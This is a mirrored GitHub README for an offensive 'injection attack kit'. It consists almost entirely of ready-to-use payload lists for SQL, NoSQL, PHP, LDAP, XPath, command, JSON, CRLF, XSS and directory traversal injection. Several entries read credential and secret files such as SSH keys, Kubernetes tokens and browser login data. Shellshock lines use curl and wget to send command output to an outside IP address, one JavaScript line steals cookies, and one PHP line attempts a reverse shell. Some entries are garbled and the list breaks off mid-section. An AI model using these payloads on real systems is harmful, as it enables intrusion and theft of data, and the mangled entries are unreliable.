Ecosyste.ms: Awesome


https://github.com/byt3n33dl3/offensivequeries

Blind Sniper Injection Attack Kit.

blindsqli injection nosql offensive-security parameters sql-injection


Injection attack examples, by: [pxcs](https://github.com/pxcs/)


> A common attack vector that uses malicious query code to manipulate a backend database and access information that was not intended to be displayed. This information may include any number of items, including sensitive company data.


### List of query injections:

| 💉 HTML Injections |
| ---- |
| ```HTML``` |
| ```Girl in a jacket``` |
| ```Sorry, your browser does not support Html``` |
| ``` 32% ``` |
| ```draw htmli``` |
| ```html``` |
| ```2 out of 10``` |
| ```%253Ci%253Ehtml%253C%252Fi%253E``` |
| ```html``` |

| 💉 HTML Injection Read File |
| ---- |
| ```/home/$USER/.bash_history``` |
| ```%2Fetc%2Fpasswd%2500``` |
| ```....//....//....//....//....//....//....//etc/passwd%00``` |
| ```%2Fetc%2Fknockd.conf``` |
| ```..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fhosts``` |
| ```..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fmotd``` |
| ```..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fmysql%2Fmy.cnf``` |
| ```..%2F..%2F..%2F..%2F..%2F..%2Fproc%2F%5B0-9%5D*%2Ffd%2F%5B0-9%5D*``` |
| ```..%2F..%2F..%2F..%2F..%2F..%2Fproc%2Fself%2Fenviron``` |
| ```..%2F..%2F..%2F..%2F..%2F..%2Fhome%2F%24USER%2F.ssh%2Fid_rsa``` |
| ```/run/secrets/kubernetes.io/serviceaccount/token``` |
| ```..%2F..%2F..%2F..%2F..%2F..%2Frun%2Fsecrets%2Fkubernetes.io%2Fserviceaccount%2Ftoken``` |
| ```/var/lib/mlocate/mlocate.db``` |
| ```..%2F..%2F..%2F..%2F..%2F..%2Fvar%2Flib%2Fmlocate.db``` |
| ```../../../../../../proc/net/arp``` |

| 💉 SQL Injections |
| ---- |
| ```0' or '0' = '0``` |
| ```1' or '1' = '1``` |
| ```' or ''-'``` |
| ```or true--``` |
| ```')) or (('x'))=(('x``` |
| ```")) or (("x"))=(("x``` |
| ```' OORR 1<2 #``` |
| ```admin' or '1'='1'--``` |
| ```admin' or '1'='1'#``` |
| ```admin') or ('1'='1``` |
| ```' or 'one'='one``` |
| ```' or uname like '%``` |
| ```") or ("1"="1"--``` |
| ```' or 1=1 LIMIT 1;#``` |
| ```') or ('a'='a and hi") or ("a"="a``` |
| ```123 ' AND 1=0 UNION ALL SELECT 'admin', '81dc9bdb52d04dc20036dbd8313ed055``` |
| ```ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A'))``` |
| ```ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6``` |
| ```ORDER BY 1,SLEEP(5),3,4#``` |
| ```UNION ALL SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14``` |
| ```UNION ALL SELECT @@VERSION,USER(),SLEEP(5)--``` |
| ```AND 5650=CONVERT(INT,(UNION ALL SELECTCHAR(88)+CHAR(88)))#``` |
| ```AND 5650=CONVERT(INT,(UNION ALL SELECTCHAR(88)))``` |
| ```UNION ALL SELECT 'INJ''ECT''XXX',2,3,4``` |
| ```%2b(select*from(select(sleep(2)))a)%2b``` |
| ```admin') or '1'='1'/*``` |
| ```admin') or ('1'='1'--``` |
| ```benchmark(50000000,MD5(1))--``` |
| ```or benchmark(50000000,MD5(1))--``` |
| ```")) or sleep(5)="``` |
| ```http://domain.com/index.php?id=1' order by 1))--``` |
| ```http://domain.com/index.php?id=1' order by 1));%00``` |
| ```http://domain.com/index.php?id=1' order by 1%60``` |
| ```http://domain.com/index.php?id=1' order by 1") ;%00``` |
| ```%23foo*%2F*bar%0D%0A``` |
| ```http://domain.com/index.php?id=1'/**/order/**/by/**/1--/**/-``` |
| ```database%23%0A(%23%0A)``` |

| 💉 NoSQL Injections |
| ---- |
| ```username[$ne]=toto&password[$ne]=toto``` |
| ```login[$gt]=admin&login[$lt]=test&pass[$ne]=1``` |
| ```login[$nin][]=admin&login[$nin][]=test&pass[$ne]=toto``` |
| ```{ "username": { "$ne": null }, "password": { "$ne": null } }``` |
| ```{ "username": "admin' OR '1'='1", "password": "password" }``` |
| ```EVAL "return redis.call('info')" 0``` |
| ```FOR user IN users FILTER user.username == 'admin' 1 == 1 RETURN user``` |
| ```{ "username": "admin", "password": { "$where": "this.password.length > 0" } }``` |
| ```username[$ne]=toto&password[$regex]=md.{1}``` |
| ```";return 'a'=='a' && ''=='``` |

| 💉 PHP Injections |
| ---- |
| ```&&id``` |
| ```;system('id')``` |
| ```system('cat /etc/passwd');``` |
| ```shell exec("id")``` |
| ```exec("ping -c 4 192.168.1.6")``` |
| ```PASSTHRU("id")``` |
| ```phpinfo();system('cat /etc/passwd')``` |
| ```print_r($_POST);system('id')``` |
| ```pcntl_exec("/usr/bin/uptime")``` |
| ```file get contents ("/etc/passwd")``` |
| ```$file = fopen ("testl.txt", "w"); echo fwrite($file, "Hello World. Testing!"); fclose($file)``` |
| ```$file = fopen ("phpinfo-1.php", "W"); echo fwrite ($file, ""); fclose ($file)``` |
| ```$file = fopen(".php", "w"); echo ($file, "php -r '$sock='' ('' ,) ;' /bin/sh -i <83 >83 2-83' ;"); fclose($)``` |
| ```passthru('id')``` |
| ```echo%20file_exists("index.html");``` |
| ```ECHO%20FILE_EXISTS("/etc/passwd");``` |
| ```echo%20copy("/etc/passwd","/tmp/passwd");``` |
| ```echo%20file_get_contents("/etc/passwd");``` |
| ```echo%20file_put_contents("index.html","Hello%20World.%20Testing!");``` |
| ```ECHO%20FILE_PUT_CONTENTS("index.html","HELLO%20WORLD.%20TESTING!");``` |

| 💉 LDAP Injections |
| ---- |
| ```(uid=*)(userPassword=*)``` |
| ```(uid=admin)((uid=*)(userPassword=*))``` |
| ```(uid=*admin*)``` |
| ```(&(uid=admin)(!(userPassword=*)))``` |
| ```(&(uid=admin)(userPassword=pa*))``` |
| ```((uid=admin)(uid=*))``` |
| ```*)(uid=*))((uid=*``` |
| ```(&(uid=admin)((userPassword=wrongpassword)(userPassword=*)))``` |
| ```(uid=*)(userPassword=*)(cn=admin)``` |
| ```(&(uid=admin)(objectClass=*))((uid=*)(objectClass=inetOrgPerson))``` |
| ```String filter = "(&(uid=" + username + ")(userPassword=" + password + "))";``` |
| ```(&(uid=admin)(&)(userPassword=anyPassword))``` |
| ```(&(uid=admin)(userPassword=*)(uid=*)``` |
| ```(&(uid=admin)(userPasswordDomain=*)(uid=*)``` |
| ```admin)(&``` |
| ```(*)(&``` |
| ```*)(&``` |

| 💉 XPath Injections |
| ---- |
| ```' or true() or '``` |
| ```' or '1'='1``` |
| ```' or name()='username' or '``` |
| ```' or 'a'='a``` |
| ```' or 1=1 or '1'='1``` |
| ```' or count(/*)=1 or '``` |
| ```' or //user/*='admin' or '``` |
| ```' or 'x'='x') or ('y'='y``` |
| ```' or 1=1 or '1'='1'/* ``` |
| ```String xpathQuery = "//user[username/text()='" + username + "' and password/text()='" + password + "']";``` |
| ```//user[username/text()='' or '1'='1' and password/text()='password']``` |
| ```//user[username/text()='username' and password/text()='' or '1'='1']``` |

| 💉 Command Injection Unix |
| ---- |
| ```<!--#exec%20cmd="/bin/cat%20/etc/passwd"-->``` |
| ```<!--#exec%20cmd="/usr/bin/id;-->``` |
| ```() { :;}; /bin/bash -c "curl http://135.23.158.130/.testing/shellshock.txt?vuln=16?user=\`whoami\`"``` |
| ```() { :;}; /bin/bash -c "curl http://135.23.158.130/.testing/shellshock.txt?vuln=18?pwd=\`pwd\`"``` |
| ```() { :;}; /bin/bash -c "sleep 1 && echo vulnerable 1"``` |
| ```() { :;}; /bin/bash -c "sleep 6 && curl http://135.23.158.130/.testing/shellshock.txt?sleep=9&?vuln=9"``` |
| ```() { :;}; /bin/bash -c "wget http://135.23.158.130/.testing/shellshock.txt?vuln=4"``` |
| ```{{ get_user_file("/etc/passwd") }}``` |
| ```() { :;}; /bin/bash -c "sleep 6 && echo vulnerable 6"``` |
| ```ca$@t /etc/passwd``` |
| ```cat $(xxd -r -ps <(echo 2f6574632f706173737764))``` |

| 💉 Command Injection Windows |
| ---- |
| ```C:\Users\{username}\AppData\Local\FileZilla``` |
| ```C:\Users\{username}\AppData\Local\Google\Chrome\User Data\Default\Login Data``` |
| ```C:\Users\{username}\AppData\Roaming\FileZilla\logs``` |
| ```C:\Users\{username}\AppData\Roaming\Microsoft\Credentials``` |
| ```C:\Windows\System32\drivers\etc\hosts``` |
| ```C:\Windows\System32\LogFiles\W3SVC1``` |

| 💉 JavaScript Injections |
| ---- |
| ```alert('Injected!');``` |
| ```document.location='http.com/steal?cookie=' + .cookie;``` |
| ```window.location='http://malicious.com';``` |
| ```document.body.innerHTML = '<h1>Hacked!</h1>';``` |
| ```while(true){}``` |
| ```Welcome,``` |
| ```document.getElementById('user').innerHTML = getQueryParameter('user');``` |
| ```http://example.com?username=alert('Injected!');``` |

| 💉 JSON Injections |
| ---- |
| ```{ "username": "admin", "password": { "$ne": null } }``` |
| ```{ "username": "user", "password": "password", "admin": true }``` |
| ```{ "username": "user", "password": "password", "password": "malicious" }``` |
| ```{ "username": "user", "bio": "alert('Injected!');" }``` |
| ```{ "username": "user", "password": { "$gt": "" } }``` |
| ```{ "user": { "name": "admin", "role": "user" }, "user": { "role": "admin" } }``` |
| ```{ "username": "user", "callback": "require('child_process').exec('ls')" }``` |
| ```{ "username": "user", "password": "' OR '1'='1" }``` |
| ```{"username": "admin","password": "' OR '1'='1"}``` |

| 💉 XML Injections |
| ---- |
| ```admin' or '1'='1``` |
| ```admintrue``` |
| ```admin' or '1'='1password``` |
| ```userpassword``` |

| 💉 Directory Traversal Injections |
| ---- |
| ```/admin/(S(X))/main.aspx``` |
| ```/admin/Foobar/(S(X))/../(S(X))/main.aspx``` |
| ```/(S(X))/admin/(S(X))/main.aspx``` |
| ```/var/log/nginx/error.log``` |
| ```../../../../../../../../../etc/passwd``` |
| ```/../../../../../../../../../../../etc/passwd%00.jpg``` |
| ```/proc/self/cwd/index.php``` |
| ```/ = %c0%af, %e0%80%af, %c0%2f``` |
| ```%uff0e%uff0e%u2216``` |

| 💉 CRLF Injections |
| ---- |
| ```/%%0a0aSet-Cookie:crlf=injection``` |
| ```/%0aSet-Cookie:crlf=injection``` |
| ```/%0d%0aSet-Cookie:crlf=injection``` |
| ```/%0dSet-Cookie:crlf=injection``` |
| ```/%23%0aSet-Cookie:crlf=injection``` |
| ```/%23%0d%0aSet-Cookie:crlf=injection``` |
| ```/%23%0dSet-Cookie:crlf=injection``` |
| ```/%25%30%61Set-Cookie:crlf=injection``` |
| ```/%25%30aSet-Cookie:crlf=injection``` |
| ```/%250aSet-Cookie:crlf=injection``` |
| ```/%25250aSet-Cookie:crlf=injection``` |
| ```/%2e%2e%2f%0d%0aSet-Cookie:crlf=injection``` |
| ```/%2f%2e%2e%0d%0aSet-Cookie:crlf=injection``` |
| ```/%2F..%0d%0aSet-Cookie:crlf=injection``` |
| ```/%3f%0d%0aSet-Cookie:crlf=injection``` |
| ```/%u000aSet-Cookie:crlf=injection``` |

| 💉 XSS Attacks |
| ---- |
| ```"-prompt(8)-"``` |
| ```'-eval("window['pro'%2B'mpt'](8)")-'``` |
| ```"onclick=prompt(8)>"@x.y``` |
| ```t>``` |
| ```javascript:alert(1);``` |
| ```'`"><\x3Cscript>javascript:alert(1)``` |
| ```